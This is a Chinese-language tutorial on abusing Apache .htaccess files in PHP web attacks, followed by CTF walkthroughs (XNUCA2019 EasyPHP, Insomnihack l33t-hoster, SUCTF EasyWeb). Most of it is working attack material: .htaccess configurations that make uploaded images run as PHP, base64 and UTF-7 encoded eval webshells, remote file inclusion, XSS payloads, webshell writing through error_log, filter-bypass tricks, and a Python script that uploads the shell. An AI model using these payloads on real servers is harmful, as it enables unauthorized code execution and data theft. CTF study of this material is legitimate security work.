与 .htaccess 相关的奇淫技巧

 

.htaccess

基本概念

.htaccess 文件是Apache中有一种特殊的文件,其提供了针对目录改变配置的方法,即在一个特定的文档目录中放置一个包含一条或多条指令的文件,以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过 Apache 的 AllowOverride 指令来设置。

.htaccess 中有 # 单行注释符,且支持 \ 拼接上下两行。

作用范围

.htaccess 文件中的配置指令作用于 .htaccess 文件所在的目录及其所有子目录,但是很重要的、需要注意的是,其上级目录也可能会有 .htaccess 文件,而指令是按查找顺序依次生效的,所以一个特定目录下的 .htaccess 文件中的指令可能会覆盖其上级目录中的 .htaccess 文件中的指令,即子目录中的指令会覆盖父目录或者主配置文件中的指令。

配置文件

启动 .htaccess,需要在服务器的主配置文件中将 AllowOverride 设置为 All,例如在 apache2.conf 中:

AllowOverride  All    # 启动.htaccess文件的使用

也可以通过 AccessFileName 将 .htaccess 修改为其他名:

AccessFileName  .config    # 将.htaccess修改为.config

 

.htaccess 常见指令

.htaccess 可以实现网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。这里我们主要讲解几种常利用的指令。详情请看官方文档:http://www.htaccess-guide.com/

SetHandler

SetHandler 指令可以强制所有匹配的文件被一个指定的处理器处理。

  • 用法:
SetHandler handler-name|None
  • 示例 1:
SetHandler application/x-httpd-php

此时当前目录及其子目录下所有文件都会被当做 php 解析。

  • 示例 2:
SetHandler server-status

开启 Apache 的服务器状态信息(server-status 是 Apache 自带一个查看 Apache 状态的功能模块),可以查看所有访问本站的记录:

访问任意不存在的文件,加参数 ?refresh=5 来实现每隔 5s 自动刷新。

AddHandler

AddHandler 指令可以实现在文件扩展名与特定的处理器之间建立映射。

  • 用法:
AddHandler handler-name extensive [extensive] ...
  • 示例:
AddHandler cgi-script .xxx

即将扩展名为 .xxx 的文件作为 CGI 脚本来处理。

AddType

AddType 指令可以将给定的文件扩展名映射到指定的内容类型。

  • 用法:
AddType media-type extensive [extensive] ...
  • 示例 1:
AddType application/x-httpd-php .gif

此时将会把 gif 为后缀的文件当做 php 文件解析。

  • 示例 2:
AddType application/x-httpd-php png jpg gif

此时将会把 .png .jpg .gif 多个后缀的文件当做 php 解析。

php_value

当使用 PHP 作为 Apache 模块时,可以用 Apache 的配置文件(例如 httpd.conf)或 .htaccess 文件中的指令来修改 PHP 的配置设定。但是需要有开启 AllowOverride Options 或 AllowOverride All 权限才可以。

php_value 指令用来设定指定的 PHP 的配置值。要清除先前设定的值,把 value 设为 none。但是 php_value 不能用来设定布尔值,如果要设定布尔值的话应该用 php_flag。

  • 用法:
php_value name value

但是并不是所有的 PHP 配置都可以用 php_value 来设定,如下查看配置可被设定范围:

如上图可知 .htaccess 的 php_value 只能用于 PHP_INI_ALL 或 PHP_INI_PERDIR 类型的指令。

  • 示例:
php_value auto_prepend_file images.png

设置访问一个 PHP 文件时,在该文件解析之前会先自动包含并解析 images.png 文件。

php_flag

php_flag 指令用来设定布尔值类型的 PHP 配置选项。

  • 用法:
php_flag name on|off

一样的,php_flag 可以设定的配置也是有范围的,如下查看配置可被设定范围:

  • 实例
php_flag engine 0

将 engine 设置为 0,即在本目录和子目录中关闭 PHP 解析,可以造成源码泄露。

 

.htaccess 的常见利用

源码泄露

我们可以通过 .htaccess 文件的 php_flag 指令对 PHP 的 engine 配置选项进行设定,当把 engine 的值设为 off(或 0)时可以禁用一个本目录和子目录中的 PHP 解析,此时将会造成源码泄露:

php_flag engine 0

这里在谷歌浏览器访问会直接显示源码(用其他浏览器访问会显示空白,还需查看源码,才可看到泄露的源码):

图片马解析

我们知道,在文件上传漏洞中经常遇到上传图片马的情况,如果目标环境开启了 .htaccess 并且上传的黑名单没有限制 .htaccess 文件的话,我们便可以先上传 .htaccess 文件,对目标环境的目录进行相应的配置,然后再上传图片,使图片的 PHP 恶意代码得以被直接解析执行。

此时,常用的的两个 .htaccess 指令如下:

  • SetHandler 指令

我们可以使用 SetHandler 指令强制将所有匹配的文件被 PHP 处理器处理并解析:

# 将images.png 当做 php 执行
<FilesMatch "images.png">
    SetHandler application/x-httpd-php
</FilesMatch>
  • AddType 指令

也可以使用 AddType 指令将给定的文件扩展名映射到 PHP 的内容类型:

# 将 .jpg 当做 php 文件解析
AddType application/x-httpd-php .png

这两种配置都可以使我们上传的非 PHP 类型的 Webshell 被当做 PHP 直接解析:

文件包含

本地文件包含

在本目录或子目录中有可解析的 PHP 文件时,可以通过 php_value 来设置 auto_prepend_file 或者 auto_append_file 配置选项来让所有的 PHP 文件自动包含一些敏感文件或恶意文件(如WebShell),来触发文件包含。

下面 .htaccess 分别通过这两个配置选项来包含 /etc/passwd,并访问同目录下的 index.php文件。

  • auto_prepend_file
php_value auto_prepend_file /etc/passwd
  • auto_append_file
php_value auto_append_file /etc/passwd

这两个配置选项用于设置访问一个 PHP 文件时,在该 PHP 文件解析之前会先自动包含并解析的文件。如下图当我们访问 index.php 时,便会自动将 /etc/passwd 包含进来:

在实际的文件上传利用中,如果目标环境的当前目录中存在至少一个 PHP 文件且上传黑名单没有限制 .htaccess 文件的话,我们便可以上传包含以上指令的 .htaccess 文件,将我们需要读取的敏感文件包含进来并读取。

同理,我们也可以让 index.php 文件包含一个含有 Webshell 的文件来 Getshell,可用于图片马的解析:

php_value auto_prepend_file images.png
或:
php_value auto_append_file images.png

远程文件包含

PHP 的 allow_url_include 配置选项这个选项默认是关闭的,如果开启的话就可以进行远程包含。因为 allow_url_include 的配置范围为 PHP_INI_SYSTEM,所以无法利用 php_flag 指令在 .htaccess 文件中开启。这里为了演示,就先在 php.ini 中设置 allow_url_include 为 On。

.htaccess 文件中的设置为:

php_value auto_prepend_file http://192.168.0.181/phpinfo.txt
或:
php_value auto_append_file http://192.168.0.181/phpinfo.txt

远程主机上的phpinfo.txt中的内容为:

<?php phpinfo();?>

这样,最终目标主机上的php文件都会包含这个远程主机上的 phpinfo.txt 并解析执行:

任意代码执行

通过 PHP 伪协议

这里主要用的还是 auto_prepend_file 或 auto_append_file 这两个配置项。

条件:

  • allow_url_fopen 为 On
  • allow_url_include 为 On
  • 目标环境的当前目录中存在至少一个 PHP 文件
php_value auto_append_file data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8+
或:
php_value auto_append_file data://text/plian,%3c%3fphp+phpinfo()%3b%3f%3e
// 如果不使用base64加密则注意需要url编码

通过解析 .htaccess 文件

  • 方法一:通过包含 .htaccess 自身
php_value auto_append_file .htaccess
#<?php phpinfo();?>

即让所有的 PHP 文件都包含 .htaccess 文件自身:

  • 方法二:直接将 .htaccess 文件当做 PHP文件处理

这种方法适合目标环境当前目录或子目录下没有 PHP 文件的情况下。

需要先在 .htaccess 里面设置允许访问 .htaccess 文件,否则是直接访问 .htaccess 文件是Forbidden的:

<Files ~ "^.ht">
    Require all granted
    Order allow,deny
    Allow from all
</Files>

然后再设置将 .htaccess 指定当做 PHP 文件处理并解析:

SetHandler application/x-httpd-php
# <?php phpinfo();?>

最终 .htaccess 文件里面的内容为:

<Files ~ "^.ht">
    Require all granted
    Order allow,deny
    Allow from all
</Files>
SetHandler application/x-httpd-php
# <?php phpinfo();?>

然后我们直接访问 .htaccess 文件即可把 .htaccess 文件当做 PHP 文件处理并执行里面的 PHP 代码:

进行 XSS 攻击

通过设置 highlight_file

我们可以通过 .htaccess 文件设定 highlight.comment 选项,指定需要高亮的内容,从而进行 XSS。

.htaccess中的内容

php_value highlight.comment '"><script>alert(1);</script>'

index.php中的内容为:

<?php
highlight_file(__FILE__);
// comment

当访问index.php时便会触发 XSS:

通过错误消息链接

.htaccess 中的内容:

php_flag display_errors 1
php_flag html_errors 1
php_value docref_root "'><script>alert(1);</script>"

index.php 中的内容为:

<?php
include('foo'); // 这里会报错

当访问index.php时便会触发 XSS:

自定义错误文件(可写Webshell)

error_log 可以将 PHP 运行报错的记录写到指定文件中,因此我们可以通过 .htaccess 文件设定 error_log 选项来自定义错误文件的存储路径,并以此来写入Webshell:

php_value error_log /var/www/html/shell.php
php_value include_path "<?php phpinfo(); __halt_compiler();"
# include_path 用来将include()的默认目录路径改变

index.php 中的内容为:

<?php
include('foo'); // 这里会报错

访问 index.php,会报错并记录在 shell.php 文件中:

如上图可见,成功将我们的phpinfo()写入了shell.php中,但是 < 等字符会经过 html 编码(如上图所示),所以我们需要用 UTF-7 编码格式来绕过。下面我们通过 [XNUCA2019Qualifier]EasyPHP 这道CTF例题来深入的探究。

[XNUCA2019Qualifier]EasyPHP

进入题目,给出源码:

<?php
    $files = scandir('./'); 
    foreach($files as $file) {
        if(is_file($file)){
            if ($file !== "index.php") {
                unlink($file);
            }
        }
    }
    include_once("fl3g.php");
    if(!isset($_GET['content']) || !isset($_GET['filename'])) {
        highlight_file(__FILE__);
        die();
    }
    $content = $_GET['content'];
    if(stristr($content,'on') || stristr($content,'html') || stristr($content,'type') || stristr($content,'flag') || stristr($content,'upload') || stristr($content,'file')) {
        echo "Hacker";
        die();
    }
    $filename = $_GET['filename'];
    if(preg_match("/[^a-z\.]/", $filename) == 1) {
        echo "Hacker";
        die();
    }
    $files = scandir('./'); 
    foreach($files as $file) {
        if(is_file($file)){
            if ($file !== "index.php") {
                unlink($file);
            }
        }
    }
    file_put_contents($filename, $content . "\nJust one chance");
?>

整个代码的逻辑也比较简单,首先删除当前目录下非index.php的文件,然后 include_once("fl3g.php");,之后获取filename和content参数的值,并将content写入filename指定的文件中。其中对filename和content都有过滤,要求content中不能有on、html等关键字,且filename不能匹配到 a-z 和点号 . 以外的字符。

这道题因为看到file_put_content和unlink自然想到了条件竞争写shell,但是测试过程虽然能够写进.php文件但是不解析。

并且由于题目服务器中间件为 Apache,因此想到了传 .htaceess 利用自定义错误文件写Webshell。但我们还需要解决一下问题。

(1)使 .htaccess 生效

如果我们直接上传.htaccess文件,由于我们写入的内容会被自动在末尾加上“\nJust one chance”,所以会使我们的.htaccess文件不生效,出现响应500的问题。为了时我们写入的.htaccess文件生效,我们要采用 \ 的方式将换行符转义成普通字符,然后用 # 来注释单行了,即:

......
# \\nJust one chance

这样我们写入上传的 .htaccess 文件就能生效了。

(2)include_path

在题目的代码中有一处 include_once("fl3g.php");,但是当我们访问fl3g.php文件时却发现该文件并不存在,这里便用到了php.ini中的include_path选项。

include_path可以用来设置include()或require()函数包含文件的参考目录路径,也就是说当使用include()或require()函数包含文件的时候,程序首先以include_path设置的路径作为参考点去找文件,如果找不到,则以程序自身所在的路径为参考点去找所要的文件,如果都找不到,则出错,那么我们就可以通过修改它来控制include的路径,那么如果我们能够在其它目录写入同名的fl3g.php让其包含,那么就能够getshell,并且可以使fl3g.php文件不被删除。

(3)指定目录写文件(error_log)

前面我们已经了解了,error_log 可以将 PHP 运行报错的记录写到指定文件中,利用这一点我们可以写Webshell。 但是如何触发报错呢?这就是为什么代码中写了一处不存在的fl3g.php的原因。我们可以将include_path的内容设置成payload的内容,这时访问页面,页面尝试将 payload 作为一个路径去访问时就会因为找不到fl3g.php而报错,并将报错记录在指定的错误文件中。

但是前面也说了,当我们传递 PHP 的 payload 时,因为我们传过去的内容会经过 html 编码,所以我们需要用 UTF-7 来绕过:

php_value include_path "+ADw?php eval(+ACQAXw-POST+AFs-whoami+AF0)+ADs?+AD4-"
php_value error_log /tmp/fl3g.php
# \

解题过程如下。

  • 第一步:写入 .htaccess error_log 相关的配置,将 payload 写入目标文件

将上述内容进行url编码,然后构造 url 并执行:

/index.php?filename=.htaccess&content=php_value%20include_path%20%22%2BADw%3Fphp%20eval(%2BACQAXw-POST%2BAFs-whoami%2BAF0)%2BADs%3F%2BAD4-%22%0Aphp_value%20error_log%20%2Ftmp%2Ffl3g.php%0A%23%20%5C

  • 第二步:访问 index.php 触发报错留下 error_log
  • 第三步:写入 .htaccess 新的配置,将 include_path 选项设定为刚才生成的fl3g.php的目录,并配置解析的编码为 UTF-7
php_value include_path "/tmp"
php_fl\    # 这里使用\加换行的方式绕过对"flag"的过滤, 即php_flag zend.multibyte 1
ag zend.multibyte 1
php_value zend.script_encoding "UTF-7"
# \

将上述内容进行url编码,然后构造 url 并执行:

/index.php?filename=.htaccess&content=php_value%20include_path%20%22%2Ftmp%22%0Aphp_fl%5C%0Aag%20zend.multibyte%201%0Aphp_value%20zend.script_encoding%20%22UTF-7%22%0A%23%20%5C

  • 第四步:构造如下读取flag
POST: whoami=system('cat /flag');

如上图所示,成功执行命令并得到flag。

这个题也可以用通过包含 .htaccess 自身的方法Getshell:

php_value auto_prepend_fi\
le ".htaccess"
#<?php @eval($_GET['cmd']); ?>\

正则回朔绕过正则匹配

《PHP利用PCRE回溯次数限制绕过某些安全限制》 这篇文章中提到了一个正则回朔绕过 preg_match 检测的方法。即 PHP 的配置选项 pcre.backtrack_limit 给 pcre 设定了一个回溯次数上限,默认为1000000,如果回溯次数超过这个数字,preg_match 会返回false,我们可以通过这一点来绕过 preg_match 等函数正则匹配的检测。

由于 .htaccess 可以设定 PHP 的配置选项,那我们便可以将 pcre.backtrack_limit 设为 0 ,从而利用这个漏洞:

php_value pcre.backtrack_limit 0
php_value pcre.jit 0
# \

我们还是通过刚才那个 CTF 例题来看一下具体的利用过程。

进入题目,给出源码:

<?php
    ......
    $filename = $_GET['filename'];
    if(preg_match("/[^a-z\.]/", $filename) == 1) {
        echo "Hacker";
        die();
    }
    ......
    file_put_contents($filename, $content . "\nJust one chance");
?>

可以看到代码中的 preg_match 使用正则匹配限制filename只能是 a-z 和点号 . ,那我们便可以通过写入 .htaccess 设置回溯次数(pcre.backtrack_limit)为 0,从而绕过这里的正则回溯,直接将我们的Webshell写入fl3g.php。

首先将 pcre.backtrack_limit 的配置写入 .htaccess:

/index.php?filename=.htaccess&content=php_value%20pcre.backtrack_limit%200%0Aphp_value%20pcre.jit%200%0A%23%20%5C

然后访问以下 url 将 Webshell 写入fl3g.php:

/index.php?filename=fl3g.php&content=<?php phpinfo();?>

执行后可以发现,成功将Webshell写入了fl3g.php:

绕过 <? 特殊字符

有时候,目标环境会限制我们上传或写入的文件内容中不能存在 <? 等特殊字符,如果没有限制 .htaccess 的话,我们同样可以使用 .htaccess 来绕过。

Base64 编码绕过

主要就是利用 auto_append_file 和 PHP 伪协议,比如我们在一个图片中写入经过base64编码后的 Webshell,然后我们便可以使用 auto_append_file 配合 php://filter 将其包含进来:

php_value auto_append_file "php://filter/convert.base64-decode/resource=images.png"

# images.png 中是经过base64编码后的Webshell

我们直接使用data://协议也是可以的,这样就不需要上传 images.png 了:

php_value auto_append_file data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8+

UTF-7 编码格式绕过

这种方法我们在前文中已经涉及到了,比如我们在一个图片中写入 UTF-7 编码格式的 Webshell:

// images.png
+ADw?php eval(+ACQAXw-POST+AFs-whoami+AF0)+ADs?+AD4-

然后我们使用 auto_append_file 将其包含进来并设置编码格式为 UTF-7 就行了:

php_value auto_append_file images.png
php_flag zend.multibyte 1
php_value zend.script_encoding "UTF-7"

当然,也可以使用 php://filer 伪协议进行 UTF-7 与 UTF-8 之间的转换,即:

php_value auto_append_file "php://filter/read=convert.iconv.utf-7.utf-8/resource=images.png"

也可以使用 .htaccess 自身包含来执行 Webshell,这样就不需要再上传一个 images.png 了:

php_value auto_append_file .htaccess
php_flag zend.multibyte 1
php_value zend.script_encoding "UTF-7"
# +ADw?php eval(+ACQAXw-POST+AFs-whoami+AF0)+ADs?+AD4-

同理,除了使用 UTF-7 外,UTF-16、UTF-32 都可以使用,方法都是一样的。

 

与 .htaccess 相关的几个 Bypass

与 .htaccess 相关限制除了使用黑名单限制 .htaccess 外,最常见的就是限制关键字以及加入脏字符啥的了。

绕过关键字过滤

绕过对关键字的过滤我们可以使用反斜杠 \ 加换行来实现。比如题目过滤了 type、php 等敏感字符,此时为了利用 .htaccess 解析图片马,我们需要将 .htaccess 写成这样:

AddTy\
pe application/x-httpd-ph\
p .png

# 即: AddType application/x-httpd-php .png

绕过脏字符

上面的 [XNUCA2019Qualifier]EasyPHP 这道题目已经涉及到了。即有时候,题目会在我们上传或写入的文件中加入一个混乱的字符(脏字符),由于这些字符不是 .htaccess 文件的语法或指令,所以会使我们的.htaccess文件不生效,出现响应500的问题。为了时我们写入的 .htaccess 文件生效,我们要采用 # 对脏字符进行注释,或使用反斜杠 \ 将换行符转义成普通字符。

绕过对上传图片的尺寸限制

有时候,在图片上传区会使用 getimagesize() 等函数对上传的图片进行尺寸限制,只允许上传指定大小尺寸的图片,并且会使用 exif_imagetype() 函数读取第一个字节并检查其图片类型。此时如果可以上传 .htaccess 来解析图片的话我们还需要让 .htaccess 的尺寸和经过 exif_imagetype() 检测后的结果符合题目要求。

我们可以使用 exif_imagetype() 函数支持的 WBMP 图像类型进行绕过。WBMP(Wireless Bitmap)是一种移动计算机设备使用的标准图像格式,是一种纯文本二进制图像格式的图片,实例如下:

#define test_width 16
#define test_height 7
static char test_bits[] = {
0x13, 0x00, 0x15, 0x00, 0x93, 0xcd, 0x55, 0xa5, 0x93, 0xc5, 0x00, 0x80,
0x00, 0x60 };

可以看到 WBMP 图像的开头可以使用 # 设置图像的尺寸大小,这正符合我们的要求。所以假设题目限制我们上传的图片尺寸必须为1337×1337,那么我们在上传.htaccess时便可以用 WBMP 来绕过,例如:

#define width 1337
#define height 1337
AddType application/x-httpd-php images.png

[Insomnihack Teaser 2019 Web]l33t-hoster

进入题目,是一个上传页面:

访问 /?source 得到源码:

<?php
if (isset($_GET["source"])) 
    die(highlight_file(__FILE__));

session_start();

if (!isset($_SESSION["home"])) {
    $_SESSION["home"] = bin2hex(random_bytes(20));
}
$userdir = "images/{$_SESSION["home"]}/";
if (!file_exists($userdir)) {
    mkdir($userdir);
}

$disallowed_ext = array(
    "php",
    "php3",
    "php4",
    "php5",
    "php7",
    "pht",
    "phtm",
    "phtml",
    "phar",
    "phps",
);


if (isset($_POST["upload"])) {
    if ($_FILES['image']['error'] !== UPLOAD_ERR_OK) {
        die("yuuuge fail");
    }

    $tmp_name = $_FILES["image"]["tmp_name"];    // 临时文件名
    $name = $_FILES["image"]["name"];    // 文件名
    $parts = explode(".", $name);
    $ext = array_pop($parts);    // 后缀

    if (empty($parts[0])) {
        array_shift($parts);
    }

    if (count($parts) === 0) {
        die("lol filename is empty");
    }

    if (in_array($ext, $disallowed_ext, TRUE)) {    // 可用大小写绕过文件后缀
        die("lol nice try, but im not stupid dude...");
    }

    $image = file_get_contents($tmp_name);
    if (mb_strpos($image, "<?") !== FALSE) {    // 文件内容中不能存在<?
        die("why would you need php in a pic.....");
    }

    if (!exif_imagetype($tmp_name)) {
        die("not an image.");
    }

    $image_size = getimagesize($tmp_name);
    if ($image_size[0] !== 1337 || $image_size[1] !== 1337) {    // 限制了图片的尺寸必须为 1337x1337
        die("lol noob, your pic is not l33t enough");
    }

    $name = implode(".", $parts);
    move_uploaded_file($tmp_name, $userdir . $name . "." . $ext);
}

echo "<h3>Your <a href=$userdir>files</a>:</h3><ul>";
foreach(glob($userdir . "*") as $file) {
    echo "<li><a href='$file'>$file</a></li>";
}
echo "</ul>";

?>

阅读源码可知,题目限制了上传的图片的内容不能存在 <?,我们可以使用编码绕过;限制了上传图片的尺寸必须为 1337×1337,我们可以直接使用 WBMP 绕过。

首先上传图片马 images.png,里面内容如下:

#define width 1337
#define height 1337
APD9waHAgZXZhbCgkX1BPU1Rbd2hvYW1pXSk7Pz4=

// <?php eval($_POST[whoami]);?>

然后上传我们的 .htaccess 解析图片马即可:

#define width 1337
#define height 1337
AddType application/x-httpd-php images.png    # 将images.png解析为 PHP 文件
php_value auto_append_file "php://filter/convert.base64-decode/resource=images.png"

[SUCTF 2019]EasyWeb

进入题目,给出源码:

<?php
function get_the_flag(){
    // webadmin will remove your upload file every 20 min!!!! 
    $userdir = "upload/tmp_".md5($_SERVER['REMOTE_ADDR']);
    if(!file_exists($userdir)){
    mkdir($userdir);
    }
    if(!empty($_FILES["file"])){
        $tmp_name = $_FILES["file"]["tmp_name"];
        $name = $_FILES["file"]["name"];
        $extension = substr($name, strrpos($name,".")+1);
    if(preg_match("/ph/i",$extension)) die("^_^"); 
        if(mb_strpos(file_get_contents($tmp_name), '<?')!==False) die("^_^");
    if(!exif_imagetype($tmp_name)) die("^_^"); 
        $path= $userdir."/".$name;
        @move_uploaded_file($tmp_name, $path);
        print_r($path);
    }
}

$hhh = @$_GET['_'];

if (!$hhh){
    highlight_file(__FILE__);
}

if(strlen($hhh)>18){
    die('One inch long, one inch strong!');
}

if ( preg_match('/[\x00- 0-9A-Za-z\'"\`~_&.,|=[\x7F]+/i', $hhh) )
    die('Try something else!');

$character_type = count_chars($hhh, 3);
if(strlen($character_type)>12) die("Almost there!");

eval($hhh);
?>

我们将代码分为两部分。

第一部分绕过:

$hhh = @$_GET['_'];
......
if ( preg_match('/[\x00- 0-9A-Za-z\'"\`~_&.,|=[\x7F]+/i', $hhh) )
    die('Try something else!');
......
eval($hhh);

这一块好绕过,直接异或绕过正则匹配,来拼接出 payload:

${%ff%ff%ff%ff^%a0%b8%ba%ab}{%ff}();&%ff=phpinfo

// %ff%ff%ff%ff^%a0%b8%ba%ab 异或结果为$_GET,{$_GET}{%ff}

如上图,phpinfo()函数执行成功,那我们就可以用这个payload来调用他题目中定义的get_the_flag()函数了,即:

${%ff%ff%ff%ff^%a0%b8%ba%ab}{%ff}();&%ff=get_the_flag

就此绕过第一段。

第二部分绕过:

function get_the_flag(){
    // webadmin will remove your upload file every 20 min!!!! 
    $userdir = "upload/tmp_".md5($_SERVER['REMOTE_ADDR']);
    if(!file_exists($userdir)){
    mkdir($userdir);
    }
    if(!empty($_FILES["file"])){
        $tmp_name = $_FILES["file"]["tmp_name"];
        $name = $_FILES["file"]["name"];
        $extension = substr($name, strrpos($name,".")+1);
    if(preg_match("/ph/i",$extension)) die("^_^"); 
        if(mb_strpos(file_get_contents($tmp_name), '<?')!==False) die("^_^");
    if(!exif_imagetype($tmp_name)) die("^_^"); 
        $path= $userdir."/".$name;
        @move_uploaded_file($tmp_name, $path);
        print_r($path);
    }
}

代码的逻辑是文件上传,过滤了文件后缀,不能出现“ph”,看来只能上传图片马配合 .htaccess 了,且 exif_imagetype 判断一个图像的类型,读取一个图像的第一个字节并检查其签名,所以我们图片马的开头要加上GIF89a,还有就是图片马文件内容中不能有“<?”。

接下来我们制作图片马,由于图片马文件内容中不能有 <?,所以我们要用编码绕过:

GIF98a12PD9waHAgZXZhbCgkX1BPU1RbJ3dob2FtaSddKTs/Pg==

所以我们 .htaccess 文件的内容为:

#define width 1337
#define height 1337
AddType application/x-httpd-php .gif
php_value auto_append_file "php://filter/convert.base64-decode/resource=/var/www/html/upload/tmp_d99081fe929b750e0557f85e6499103f/shell.gif"

最后,我们编写脚本,一键化上传图片马和.htaccess:

import requests

url = "http://2eebfa72-c0ca-4331-a85a-dd3878052073.node3.buuoj.cn/?_=${%ff%ff%ff%ff^%a0%b8%ba%ab}{%ff}();&%ff=get_the_flag"
shell = {"file":('images.gif',open('images.gif','rb'),'image/gif')}
r = requests.post(url=url,files=shell)
print(r.text)

htaccess = {"file":('.htaccess',open('.htaccess','rb'),'image/gif')}
r2 = requests.post(url=url,files=htaccess)
print(r2.text)

成功上传后使用蚁剑成功连接images.gif:

参考:
https://xz.aliyun.com/t/8267
https://www.jianshu.com/p/02a915d77654
https://www.cnblogs.com/anbuxuan/p/11867129.html

(完)